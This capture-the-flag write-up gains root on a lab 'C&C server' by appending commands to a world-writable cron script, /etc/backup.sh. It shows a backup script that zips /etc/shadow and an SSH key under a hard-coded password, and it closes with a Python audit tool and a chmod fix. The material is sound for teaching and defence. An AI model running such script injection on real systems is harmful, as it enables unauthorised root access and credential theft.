Great, now you have access to the hacker's command & control server. But you probably need higher-level access to find more valuable information. Escalate privileges to root on the command & control server at 10.XX.32.130 and read the flag from /root/flag.txt.
Looking at the README retrieved in C&C Access reveals information about custom scheduled tasks via crontab.
#********************************************************#
# This share contains regular backups of our C&C server. #
#********************************************************#
Manual backups can be done by copying stuff to /share folder
For automated backups, specify a folder to back up in cronjob script.
/etc/crontab - Cron jobs
/etc/backup.sh - Backup script running every minute.
TO-DO!
DONE - B̶a̶c̶k̶u̶p̶ ̶p̶a̶s̶s̶w̶d̶ ̶a̶n̶d̶ ̶s̶h̶a̶d̶o̶w̶ ̶f̶i̶l̶e̶
DONE - P̶r̶o̶t̶e̶c̶t̶ ̶t̶h̶e̶ ̶c̶r̶e̶d̶z̶ ̶z̶i̶p̶ ̶f̶i̶l̶e̶ ̶w̶i̶t̶h̶ ̶p̶a̶s̶s̶w̶o̶r̶d̶
Set password to backup share!
Indeed, there is a scheduled task, /etc/backup.sh, defined in /etc/crontab, which is run by the root user every minute.
max@command_control_SRV1:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root /etc/backup.sh >/dev/null 2>&1
#
The file /etc/backup.sh contains the script that creates the credz_backup.zip seen previously.
max@command_control_SRV1:~$ cat /etc/backup.sh
#!/bin/bash
# Back up the credentials for the system. Just in case max, change the passwords after initial testing
zip -e --password computer /share/credz_backup.zip -u /etc/passwd /etc/shadow /home/max/id_rsa
The file /etc/backup.sh is world-writable, meaning any local user can modify it, while root executes it every minute.
max@command_control_SRV1:~$ ls -al /etc/backup.sh
-rwxrw-rw- 1 root root 211 Oct 24 11:42 /etc/backup.sh
Append commands to /etc/backup.sh to make a copy of the flag.
max@command_control_SRV1:~$ echo >> /etc/backup.sh
max@command_control_SRV1:~$ echo "cat /root/flag.txt > /tmp/flag; chmod 777 /tmp/flag" >> /etc/backup.sh
Wait a minute for cron to execute /etc/backup.sh, then read the flag from /tmp/flag.
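The root cause here is a root cron job pointing at a script that other users can write. The following audit script, added for this write-up and not part of the original challenge, parses /etc/crontab-style lines (five time fields, user, command), pulls out the absolute script paths each root job executes, and reports any that a user other than the job owner could alter. The crontab text and the 0766 backup.sh it creates in a temporary directory are constructed to mirror the listing above; the `root` parameter and the `demo()` helper are assumptions of this example, added so it runs without touching the real /etc.

```python
"""Audit a system crontab for root jobs whose script is writable by others.
Added example for this write-up; not a tool from the original page."""
import os
import re
import stat
import tempfile

# Constructed sample: the relevant /etc/crontab lines from the write-up.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root /etc/backup.sh >/dev/null 2>&1
"""


def parse_system_crontab(text):
    """Return (user, command) for each job line in a /etc/crontab-style file.
    Skips blank lines, comments and VAR=value assignments; handles both the
    five-field form and @reboot/@daily style specials."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        if line.startswith("@"):
            parts = line.split(None, 2)          # @special user command
            if len(parts) == 3:
                jobs.append((parts[1], parts[2]))
            continue
        parts = line.split(None, 6)              # m h dom mon dow user command
        if len(parts) == 7:
            jobs.append((parts[5], parts[6]))
    return jobs


def script_paths(command):
    """Return absolute paths that appear as the first token of each shell
    segment (split on &&, ||, ; and |), i.e. the programs cron will execute."""
    paths = []
    for segment in re.split(r"&&|\|\||;|\|", command):
        tokens = segment.strip().split()
        if tokens and tokens[0].startswith("/"):
            paths.append(tokens[0])
    return paths


def writable_by_others(st, owner_uid, owner_gid):
    """Reasons a file with stat result `st` could be altered by someone other
    than the account (owner_uid/owner_gid) the job runs as."""
    reasons = []
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    if st.st_mode & stat.S_IWGRP and st.st_gid != owner_gid:
        reasons.append("group-writable (gid %d)" % st.st_gid)
    if st.st_uid != owner_uid:
        reasons.append("owned by uid %d" % st.st_uid)
    return reasons


def audit(crontab_text, job_user="root", owner_uid=0, owner_gid=0, root="/"):
    """Return [(path, command, reasons)] for jobs run as `job_user` whose script
    is writable by others. `root` (assumption of this example) lets the check
    run against a staged directory tree instead of the live filesystem."""
    findings = []
    for user, command in parse_system_crontab(crontab_text):
        if user != job_user:
            continue
        for path in script_paths(command):
            real = os.path.join(root, path.lstrip("/"))
            if not os.path.isfile(real):
                continue
            reasons = writable_by_others(os.stat(real), owner_uid, owner_gid)
            if reasons:
                findings.append((real, command, reasons))
    return findings


def demo():
    """Stage a fake /etc/backup.sh with mode 0766 (the -rwxrw-rw- from the
    write-up) in a temp dir and audit the sample crontab against it. The
    current user stands in for root as the job owner, so the only finding
    should be the world-writable bit."""
    with tempfile.TemporaryDirectory() as tmp:
        os.makedirs(os.path.join(tmp, "etc"))
        script = os.path.join(tmp, "etc", "backup.sh")
        with open(script, "w") as fh:
            fh.write("#!/bin/bash\nzip -e /share/credz_backup.zip /etc/shadow\n")
        os.chmod(script, 0o766)
        os.chown(script, os.getuid(), os.getgid())
        return audit(SAMPLE_CRONTAB, owner_uid=os.getuid(),
                     owner_gid=os.getgid(), root=tmp)


if __name__ == "__main__":
    for path, command, reasons in demo():
        print("%s (%s) <- %s" % (path, ", ".join(reasons), command))
```

Run it as root against the live file with `audit(open("/etc/crontab").read())`; the fix the finding points to is `chmod 755 /etc/backup.sh` (root-owned, no group or world write), after which the audit returns nothing. The same logic applies to the files under /etc/cron.d and the run-parts directories, which the script does not descend into.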